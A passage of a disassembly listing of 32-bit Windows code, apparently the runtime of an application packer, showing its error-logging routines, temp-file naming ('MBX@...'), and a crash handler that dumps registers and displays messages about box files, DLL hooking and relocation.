mov [ebp+var_8], offset dword_4249A8
push [ebp+arg_4]
push [ebp+arg_0]
push offset aErrorAtSDReaso ; "Error at %s:%d\n\nReason: "
push [ebp+var_8]
call ds:dword_424754 ; wsprintfA
add esp, 10h
mov [ebp+var_C], eax
lea eax, [ebp+arg_C]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_8]
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
push eax
call ds:dword_424758 ; wvsprintfA
and [ebp+var_4], 0
mov ecx, [ebp+var_8]
call sub_41BB26
mov ecx, offset asc_423D28 ; "\n"
call sub_41BB26
mov ecx, [ebp+var_8]
call sub_41BAF1
leave
retn
sub_41BB7C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BBE7 proc near ; CODE XREF: sub_4184A0+102�p
; sub_420D80+8�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_8], offset dword_4249A8
lea eax, [ebp+arg_4]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_0]
push [ebp+var_8]
call ds:dword_424758 ; wvsprintfA
and [ebp+var_4], 0
mov ecx, [ebp+var_8]
call sub_41BB26
mov ecx, offset asc_423D28 ; "\n"
call sub_41BB26
mov ecx, [ebp+var_8]
call sub_41BAF1
leave
retn
sub_41BBE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BC28 proc near ; CODE XREF: sub_41BB26+30�p
; sub_41BE16+74�p ...
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421508
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 1Ch
push ebx
push esi
push edi
push offset dword_424988
call ds:dword_424644 ; RtlEnterCriticalSection
and [ebp+var_1C], 0
and [ebp+var_4], 0
mov eax, offset dword_411740
mov eax, [eax+4]
mov eax, [eax+60h]
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jnz loc_41BD9D
push 400h
call sub_41BA4A
pop ecx
mov [ebp+var_30], eax
mov eax, [ebp+var_30]
mov [ebp+var_1C], eax
push 0
call ds:dword_424698 ; GetModuleHandleA
mov ecx, offset dword_411740
mov ecx, [ecx+4]
mov [ecx+64h], eax
mov eax, offset dword_411740
mov eax, [eax+4]
cmp dword ptr [eax+64h], 0
jnz short loc_41BCB2
jmp loc_41BDE6
; ---------------------------------------------------------------------------
loc_41BCB2: ; CODE XREF: sub_41BC28+83�j
push 400h
push [ebp+var_1C]
mov eax, offset dword_411740
mov eax, [eax+4]
push dword ptr [eax+64h]
call ds:dword_424694 ; GetModuleFileNameA
test eax, eax
jnz short loc_41BCD4
jmp loc_41BDE6
; ---------------------------------------------------------------------------
loc_41BCD4: ; CODE XREF: sub_41BC28+A5�j
mov edi, [ebp+var_1C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_24], ecx
push offset aUp_txt ; "-up.txt"
mov eax, [ebp+var_1C]
add eax, [ebp+var_24]
push eax
call ds:dword_424754 ; wsprintfA
pop ecx
pop ecx
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push [ebp+var_1C]
call ds:dword_424628 ; CreateFileA
mov ecx, offset dword_411740
mov ecx, [ecx+4]
mov [ecx+60h], eax
mov eax, offset dword_411740
mov eax, [eax+4]
mov eax, [eax+60h]
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_41BD38
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_41BD80
loc_41BD38: ; CODE XREF: sub_41BC28+108�j
push offset aUp1_txt ; "-up1.txt"
mov eax, [ebp+var_1C]
add eax, [ebp+var_24]
push eax
call ds:dword_424754 ; wsprintfA
pop ecx
pop ecx
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push [ebp+var_1C]
call ds:dword_424628 ; CreateFileA
mov ecx, offset dword_411740
mov ecx, [ecx+4]
mov [ecx+60h], eax
mov eax, offset dword_411740
mov eax, [eax+4]
mov eax, [eax+60h]
mov [ebp+var_20], eax
loc_41BD80: ; CODE XREF: sub_41BC28+10E�j
cmp [ebp+var_20], 0
jz short loc_41BD8C
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_41BD8E
loc_41BD8C: ; CODE XREF: sub_41BC28+15C�j
jmp short loc_41BDE6
; ---------------------------------------------------------------------------
loc_41BD8E: ; CODE XREF: sub_41BC28+162�j
push 2
push 0
push 0
push [ebp+var_20]
call ds:dword_424708 ; SetFilePointer
loc_41BD9D: ; CODE XREF: sub_41BC28+4A�j
cmp [ebp+var_20], 0FFFFFFFFh
jz short loc_41BDD7
push 0
lea eax, [ebp+var_28]
push eax
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
push ecx
push [ebp+arg_0]
push [ebp+var_20]
call ds:dword_42473C ; WriteFile
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
cmp [ebp+var_28], ecx
jz short loc_41BDD7
jmp short loc_41BDE6
; ---------------------------------------------------------------------------
loc_41BDD7: ; CODE XREF: sub_41BC28+179�j
; sub_41BC28+1AB�j ...
push 0FFFFFFFFh
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
jmp short loc_41BE07
; ---------------------------------------------------------------------------
loc_41BDE6: ; CODE XREF: sub_41BC28+85�j
; sub_41BC28+A7�j ...
and [ebp+var_2C], 0
jmp short loc_41BDD7
; ---------------------------------------------------------------------------
loc_41BDEC: ; DATA XREF: _4:00421510�o
push offset dword_424988
call ds:dword_4246D4 ; RtlLeaveCriticalSection
mov eax, [ebp+var_1C]
mov [ebp+var_34], eax
push [ebp+var_34]
call sub_41BACD
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41BE07: ; CODE XREF: sub_41BC28+1BC�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41BC28 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BE16 proc near ; CODE XREF: sub_414C5A+345�p
; sub_41C317+1D�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
; FUNCTION CHUNK AT 0041BEAB SIZE 0000000F BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421518
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 14h
push ebx
push esi
push edi
and [ebp+var_1C], 0
and [ebp+var_4], 0
push 1000h
call sub_41BA4A
pop ecx
mov [ebp+var_28], eax
mov eax, [ebp+var_28]
mov [ebp+var_1C], eax
lea eax, [ebp+arg_4]
mov [ebp+var_20], eax
push [ebp+var_20]
push [ebp+arg_0]
push [ebp+var_1C]
call ds:dword_424758 ; wvsprintfA
mov [ebp+var_24], eax
push offset asc_423D5C ; "\r\n"
mov eax, [ebp+var_1C]
add eax, [ebp+var_24]
push eax
call ds:dword_424754 ; wsprintfA
pop ecx
pop ecx
and [ebp+var_20], 0
push [ebp+var_1C]
call sub_41BC28
pop ecx
or [ebp+var_4], 0FFFFFFFFh
call sub_41BE9B
jmp short loc_41BEAB
sub_41BE16 endp
; =============== S U B R O U T I N E =======================================
sub_41BE9B proc near ; CODE XREF: sub_41BE16+7E�p
; DATA XREF: _4:00421520�o
mov eax, [ebp-1Ch]
mov [ebp-2Ch], eax
push dword ptr [ebp-2Ch]
call sub_41BACD
pop ecx
retn
sub_41BE9B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41BE16
loc_41BEAB: ; CODE XREF: sub_41BE16+83�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_41BE16
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BEBA proc near ; CODE XREF: sub_419995+C6C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0041BF73 SIZE 0000000F BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421528
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 10h
push ebx
push esi
push edi
and [ebp+var_1C], 0
and [ebp+var_20], 0
and [ebp+var_4], 0
push 1000h
call sub_41BA4A
pop ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov [ebp+var_1C], eax
push 0
push 0
lea eax, [ebp+var_20]
push eax
push 400h
call ds:dword_424690 ; RtlGetLastWin32Error
push eax
push 0
push 1300h
call ds:dword_42465C ; FormatMessageA
cmp [ebp+var_20], 0
jz short loc_41BF49
push [ebp+arg_4]
push [ebp+arg_0]
push [ebp+var_20]
push offset aWindowsErrorSA ; "windows error %s\n at %s(%d)\n"
push [ebp+var_1C]
call ds:dword_424754 ; wsprintfA
add esp, 14h
push [ebp+var_1C]
call sub_41BC28
pop ecx
loc_41BF49: ; CODE XREF: sub_41BEBA+6A�j
or [ebp+var_4], 0FFFFFFFFh
call sub_41BF54
jmp short loc_41BF73
sub_41BEBA endp
; =============== S U B R O U T I N E =======================================
sub_41BF54 proc near ; CODE XREF: sub_41BEBA+93�p
; DATA XREF: _4:00421530�o
cmp dword ptr [ebp-20h], 0
jz short loc_41BF63
push dword ptr [ebp-20h]
call ds:dword_4246E4 ; LocalFree
loc_41BF63: ; CODE XREF: sub_41BF54+4�j
mov eax, [ebp-1Ch]
mov [ebp-28h], eax
push dword ptr [ebp-28h]
call sub_41BACD
pop ecx
retn
sub_41BF54 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41BEBA
loc_41BF73: ; CODE XREF: sub_41BEBA+98�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_41BEBA
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BF82 proc near ; CODE XREF: sub_41925C+A2�p
; sub_419995+1DF�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push edi
movzx eax, ds:byte_4249A0
and eax, 1
test eax, eax
jnz short loc_41BFAE
mov al, ds:byte_4249A0
or al, 1
mov ds:byte_4249A0, al
call ds:dword_424668 ; GetCurrentProcessId
mov ds:dword_424980, eax
loc_41BFAE: ; CODE XREF: sub_41BF82+13�j
cmp [ebp+arg_8], 0
jnz short loc_41BFBE
mov eax, ds:dword_424980
mov [ebp+var_10], eax
jmp short loc_41BFC4
; ---------------------------------------------------------------------------
loc_41BFBE: ; CODE XREF: sub_41BF82+30�j
mov eax, [ebp+arg_8]
mov [ebp+var_10], eax
loc_41BFC4: ; CODE XREF: sub_41BF82+3A�j
mov eax, [ebp+var_10]
mov [ebp+var_8], eax
push 124h
call sub_41BA4A
pop ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov [ebp+var_4], eax
push 49h
pop ecx
xor eax, eax
mov edi, [ebp+var_4]
rep stosd
push [ebp+var_4]
push 104h
call ds:dword_4246B4 ; GetTempPathA
movzx eax, [ebp+arg_4]
test eax, eax
jz short loc_41C038
mov eax, ds:dword_4289A8
inc eax
mov ds:dword_4289A8, eax
push ds:dword_4289A8
push [ebp+arg_0]
push [ebp+var_8]
push offset aMbx@X@X@X_ ; "MBX@%X@%X@%X.###"
mov edi, [ebp+var_4]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov eax, [ebp+var_4]
add eax, ecx
push eax
call ds:dword_424754 ; wsprintfA
add esp, 14h
jmp short loc_41C08B
; ---------------------------------------------------------------------------
loc_41C038: ; CODE XREF: sub_41BF82+7A�j
cmp [ebp+arg_0], 0FFFFFFFFh
jz short loc_41C067
push [ebp+arg_0]
push [ebp+var_8]
push offset aMbx@X@X_ ; "MBX@%X@%X.###"
mov edi, [ebp+var_4]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov eax, [ebp+var_4]
add eax, ecx
push eax
call ds:dword_424754 ; wsprintfA
add esp, 10h
jmp short loc_41C08B
; ---------------------------------------------------------------------------
loc_41C067: ; CODE XREF: sub_41BF82+BA�j
push [ebp+var_8]
push offset aMbx@X@_ ; "MBX@%X@*.###"
mov edi, [ebp+var_4]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov eax, [ebp+var_4]
add eax, ecx
push eax
call ds:dword_424754 ; wsprintfA
add esp, 0Ch
loc_41C08B: ; CODE XREF: sub_41BF82+B4�j
; sub_41BF82+E3�j
mov edi, [ebp+var_4]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
push ecx
push [ebp+var_4]
call ds:dword_424748 ; CharUpperBuffA
mov eax, [ebp+var_4]
pop edi
leave
retn
sub_41BF82 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C0A8 proc near ; CODE XREF: sub_41C106+E1�p
; sub_41C106+150�p
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
movzx eax, [ebp+arg_0]
cmp eax, 30h
jl short loc_41C0C6
movzx eax, [ebp+arg_0]
cmp eax, 39h
jg short loc_41C0C6
movzx eax, [ebp+arg_0]
sub eax, 30h
jmp short loc_41C104
; ---------------------------------------------------------------------------
loc_41C0C6: ; CODE XREF: sub_41C0A8+A�j
; sub_41C0A8+13�j
movzx eax, [ebp+arg_0]
cmp eax, 41h
jl short loc_41C0E1
movzx eax, [ebp+arg_0]
cmp eax, 46h
jg short loc_41C0E1
movzx eax, [ebp+arg_0]
sub eax, 37h
jmp short loc_41C104
; ---------------------------------------------------------------------------
loc_41C0E1: ; CODE XREF: sub_41C0A8+25�j
; sub_41C0A8+2E�j
movzx eax, [ebp+arg_0]
cmp eax, 61h
jl short loc_41C0FC
movzx eax, [ebp+arg_0]
cmp eax, 66h
jg short loc_41C0FC
movzx eax, [ebp+arg_0]
sub eax, 57h
jmp short loc_41C104
; ---------------------------------------------------------------------------
loc_41C0FC: ; CODE XREF: sub_41C0A8+40�j
; sub_41C0A8+49�j
mov eax, [ebp+arg_4]
mov byte ptr [eax], 1
xor eax, eax
loc_41C104: ; CODE XREF: sub_41C0A8+1C�j
; sub_41C0A8+37�j ...
pop ebp
retn
sub_41C0A8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C106 proc near ; CODE XREF: sub_41553D+278�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4A = byte ptr -4Ah
var_49 = byte ptr -49h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421538
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 40h
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
cmp [ebp+arg_0], 0
jz loc_41C2E5
call ds:dword_424668 ; GetCurrentProcessId
mov [ebp+var_1C], eax
push 5Ch
push [ebp+arg_0]
call sub_4105C0
pop ecx
pop ecx
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_41C161
mov eax, [ebp+var_24]
inc eax
mov [ebp+arg_0], eax
loc_41C161: ; CODE XREF: sub_41C106+52�j
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_20], ecx
cmp [ebp+var_20], 4
jle loc_41C2E5
push 4
pop ecx
mov edi, offset aMbx@ ; "MBX@"
mov esi, [ebp+arg_0]
xor eax, eax
mov [ebp+var_34], eax
repe cmpsb
jz short loc_41C197
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_34], eax
loc_41C197: ; CODE XREF: sub_41C106+87�j
mov eax, [ebp+var_34]
mov [ebp+var_38], eax
cmp [ebp+var_38], 0
jnz loc_41C2E5
mov eax, [ebp+arg_0]
add eax, 4
mov [ebp+arg_0], eax
push 40h
push [ebp+arg_0]
call sub_410810
pop ecx
pop ecx
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz loc_41C2E5
and [ebp+var_30], 0
and [ebp+var_2C], 0
loc_41C1D1: ; CODE XREF: sub_41C106+FC�j
lea eax, [ebp+var_2C]
push eax
mov eax, [ebp+arg_0]
mov al, [eax]
mov byte ptr [ebp+var_3C], al
push [ebp+var_3C]
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
call sub_41C0A8
pop ecx
pop ecx
and eax, 0Fh
mov ecx, [ebp+var_30]
shl ecx, 4
or eax, ecx
mov [ebp+var_30], eax
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_28]
jnz short loc_41C1D1
movzx eax, [ebp+var_2C]
test eax, eax
jnz loc_41C2E5
mov eax, [ebp+var_30]
cmp eax, [ebp+var_1C]
jnz loc_41C2E5
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
push 2Eh
push [ebp+arg_0]
call sub_410810
pop ecx
pop ecx
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz loc_41C2E5
and [ebp+var_30], 0
loc_41C240: ; CODE XREF: sub_41C106+16B�j
lea eax, [ebp+var_2C]
push eax
mov eax, [ebp+arg_0]
mov al, [eax]
mov byte ptr [ebp+var_40], al
push [ebp+var_40]
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
call sub_41C0A8
pop ecx
pop ecx
and eax, 0Fh
mov ecx, [ebp+var_30]
shl ecx, 4
or eax, ecx
mov [ebp+var_30], eax
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_28]
jnz short loc_41C240
movzx eax, [ebp+var_2C]
test eax, eax
jnz short loc_41C2E5
mov [ebp+var_44], offset a_ ; ".###"
mov eax, [ebp+arg_0]
mov [ebp+var_48], eax
loc_41C288: ; CODE XREF: sub_41C106+1B4�j
mov eax, [ebp+var_48]
mov al, [eax]
mov [ebp+var_49], al
mov ecx, [ebp+var_44]
cmp al, [ecx]
jnz short loc_41C2C2
cmp [ebp+var_49], 0
jz short loc_41C2BC
mov eax, [ebp+var_48]
mov al, [eax+1]
mov [ebp+var_4A], al
mov ecx, [ebp+var_44]
cmp al, [ecx+1]
jnz short loc_41C2C2
add [ebp+var_48], 2
add [ebp+var_44], 2
cmp [ebp+var_4A], 0
jnz short loc_41C288
loc_41C2BC: ; CODE XREF: sub_41C106+195�j
and [ebp+var_50], 0
jmp short loc_41C2CA
; ---------------------------------------------------------------------------
loc_41C2C2: ; CODE XREF: sub_41C106+18F�j
; sub_41C106+1A6�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_50], eax
loc_41C2CA: ; CODE XREF: sub_41C106+1BA�j
mov eax, [ebp+var_50]
mov [ebp+var_54], eax
cmp [ebp+var_54], 0
jnz short loc_41C2E5
mov eax, [ebp+var_30]
mov [ebp+var_58], eax
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_58]
jmp short loc_41C2F8
; ---------------------------------------------------------------------------
loc_41C2E5: ; CODE XREF: sub_41C106+30�j
; sub_41C106+6F�j ...
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41C2F6
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_41C2F6: ; CODE XREF: sub_41C106+1E3�j
xor eax, eax
loc_41C2F8: ; CODE XREF: sub_41C106+1DD�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41C106 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C307 proc near ; CODE XREF: sub_411310+3EA�p
push ebp
mov ebp, esp
push offset sub_41C317
call ds:dword_424710 ; SetUnhandledExceptionFilter
pop ebp
retn
sub_41C307 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C317 proc near ; CODE XREF: sub_419529+20B�p
; sub_419529+32E�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B8h]
mov eax, [ebp+arg_0]
mov eax, [eax]
push dword ptr [eax]
push offset a__seh__0xXAt0x ; "__SEH__ 0x%x at 0x%x"
call sub_41BE16
add esp, 0Ch
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0C8h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+98h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0BCh]
push offset aCs0x08xSs0x08x ; "CS :0x%08X SS :0x%08X DS :0x%08X"
call sub_41BE16
add esp, 10h
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+8Ch]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+90h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+94h]
push offset aEs0x08xFs0x08x ; "ES :0x%08X FS :0x%08X GS :0x%08X"
call sub_41BE16
add esp, 10h
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0ACh]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0A8h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B0h]
push offset aEax0x08xEdx0x0 ; "EAX:0x%08X EDX:0x%08X ECX:0x%08X"
call sub_41BE16
add esp, 10h
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B8h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B4h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0C4h]
push offset aEsp0x08xEbp0x0 ; "ESP:0x%08X EBP:0x%08X EIP:0x%08X"
call sub_41BE16
add esp, 10h
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+9Ch]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0A0h]
push offset aEsi0x08xEdi0x0 ; "ESI:0x%08X EDI:0x%08X"
call sub_41BE16
add esp, 0Ch
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0C4h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B4h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B8h]
call sub_41C87E
add esp, 0Ch
and [ebp+var_4], 0
mov eax, [ebp+arg_0]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, 11000000h
mov [ebp+var_8], eax
cmp [ebp+var_8], 16h
ja loc_41C557
mov eax, [ebp+var_8]
jmp ds:off_41C587[eax*4]
loc_41C47E: ; DATA XREF: _3:off_41C587�o
mov [ebp+var_4], offset aAssertionFaile ; "ASSERTION FAILED"
jmp loc_41C557
; ---------------------------------------------------------------------------
loc_41C48A: ; CODE XREF: sub_41C317+160�j
; DATA XREF: _3:0041C58B�o
mov [ebp+var_4], offset aHasNoAccessToE ; "HAS NO ACCESS TO EXECUTABLE"
jmp loc_41C557
; ---------------------------------------------------------------------------
loc_41C496: ; CODE XREF: sub_41C317+160�j
; DATA XREF: _3:0041C58F�o
mov [ebp+var_4], offset aExecutableIsNo ; "EXECUTABLE IS NOT NT IMAGE"
jmp loc_41C557
; ---------------------------------------------------------------------------
loc_41C4A2: ; CODE XREF: sub_41C317+160�j
; DATA XREF: _3:0041C5B7�o
mov [ebp+var_4], offset aDynamicLibrary ; "DYNAMIC LIBRARY IS NOT NT IMAGE"
jmp loc_41C557
; ---------------------------------------------------------------------------
loc_41C4AE: ; CODE XREF: sub_41C317+160�j
; DATA XREF: _3:0041C593�o
mov [ebp+var_4], offset aExecutableCorr ; "EXECUTABLE CORRUPTED"
jmp loc_41C557
; ---------------------------------------------------------------------------
loc_41C4BA: ; CODE XREF: sub_41C317+160�j
; DATA XREF: _3:0041C597�o
mov [ebp+var_4], offset aPathIsVeryLong ; "PATH IS VERY LONG"
jmp loc_41C557
; ---------------------------------------------------------------------------
loc_41C4C6: ; CODE XREF: sub_41C317+160�j
; DATA XREF: _3:0041C59B�o
mov [ebp+var_4], offset aCouldNotOpenBo ; "COULD NOT OPEN BOXFILE"
jmp loc_41C557
; ---------------------------------------------------------------------------
loc_41C4D2: ; CODE XREF: sub_41C317+160�j
; DATA XREF: _3:0041C59F�o
mov [ebp+var_4], offset aReadBoxfileErr ; "READ BOXFILE ERROR"
jmp short loc_41C557
; ---------------------------------------------------------------------------
loc_41C4DB: ; CODE XREF: sub_41C317+160�j
; DATA XREF: _3:0041C5A3�o
mov [ebp+var_4], offset aBoxfileCorrupt ; "BOXFILE CORRUPTED"
jmp short loc_41C557
; ---------------------------------------------------------------------------
loc_41C4E4: ; CODE XREF: sub_41C317+160�j
; DATA XREF: _3:0041C5A7�o
mov [ebp+var_4], offset aFeatureIsNotIm ; "FEATURE IS NOT IMPLEMENTED"
jmp short loc_41C557
; ---------------------------------------------------------------------------
loc_41C4ED: ; CODE XREF: sub_41C317+160�j
; DATA XREF: _3:0041C5AB�o
mov [ebp+var_4], offset aOutOfMemory ; "OUT OF MEMORY"
jmp short loc_41C557
; ---------------------------------------------------------------------------
loc_41C4F6: ; CODE XREF: sub_41C317+160�j
; DATA XREF: _3:0041C5AF�o
mov [ebp+var_4], offset aWrappersTableB ; "WRAPPERS TABLE BROKEN"
jmp short loc_41C557
; ---------------------------------------------------------------------------
loc_41C4FF: ; CODE XREF: sub_41C317+160�j
; DATA XREF: _3:0041C5B3�o
mov [ebp+var_4], offset aVirtualprote_0 ; "VIRTUALPROTECT BROKEN"
jmp short loc_41C557
; ---------------------------------------------------------------------------
loc_41C508: ; CODE XREF: sub_41C317+160�j
; DATA XREF: _3:0041C5BB�o
mov [ebp+var_4], offset aCouldNotCreate ; "COULD NOT CREATE HEAP"
jmp short loc_41C557
; ---------------------------------------------------------------------------
loc_41C511: ; CODE XREF: sub_41C317+160�j
; DATA XREF: _3:0041C5BF�o
mov [ebp+var_4], offset aHeapCorrupted ; "HEAP CORRUPTED"
jmp short loc_41C557
; ---------------------------------------------------------------------------
loc_41C51A: ; CODE XREF: sub_41C317+160�j
; DATA XREF: _3:0041C5C7�o
mov [ebp+var_4], offset aDllCorrupted ; "DLL CORRUPTED"
jmp short loc_41C557
; ---------------------------------------------------------------------------
loc_41C523: ; CODE XREF: sub_41C317+160�j
; DATA XREF: _3:0041C5D7�o
mov [ebp+var_4], offset aInvalidCompres ; "INVALID COMPRESSION/ENCRYPTION ALGORITH"...
jmp short loc_41C557
; ---------------------------------------------------------------------------
loc_41C52C: ; CODE XREF: sub_41C317+160�j
; DATA XREF: _3:0041C5C3�o
mov [ebp+var_4], offset aPackedDllOrBox ; "PACKED DLL OR BOXFILE CORRUPTED"
jmp short loc_41C557
; ---------------------------------------------------------------------------
loc_41C535: ; CODE XREF: sub_41C317+160�j
; DATA XREF: _3:0041C5CB�o
mov [ebp+var_4], offset aHookingDllErro ; "HOOKING DLL ERROR"
jmp short loc_41C557
; ---------------------------------------------------------------------------
loc_41C53E: ; CODE XREF: sub_41C317+160�j
; DATA XREF: _3:0041C5CF�o
mov [ebp+var_4], offset aGetmodulenameE ; "GetModuleName ERROR"
jmp short loc_41C557
; ---------------------------------------------------------------------------
loc_41C547: ; CODE XREF: sub_41C317+160�j
; DATA XREF: _3:0041C5D3�o
mov [ebp+var_4], offset aBadFuulname ; "BAD FUULNAME"
jmp short loc_41C557
; ---------------------------------------------------------------------------
loc_41C550: ; CODE XREF: sub_41C317+160�j
; DATA XREF: _3:0041C5DF�o
mov [ebp+var_4], offset aInvalidDllRelo ; "INVALID DLL RELOCATION"
loc_41C557: ; CODE XREF: sub_41C317+157�j
; sub_41C317+160�j ...
cmp [ebp+var_4], 0
jz short loc_41C57C
push 0
push 0
call ds:dword_424744 ; ChangeDisplaySettingsA
push 10h
push ds:off_4214EC
push [ebp+var_4]
push 0
call ds:dword_424750 ; MessageBoxA
jmp short loc_41C580
; ---------------------------------------------------------------------------
loc_41C57C: ; CODE XREF: sub_41C317+244�j
xor eax, eax
jmp short locret_41C583
; ---------------------------------------------------------------------------
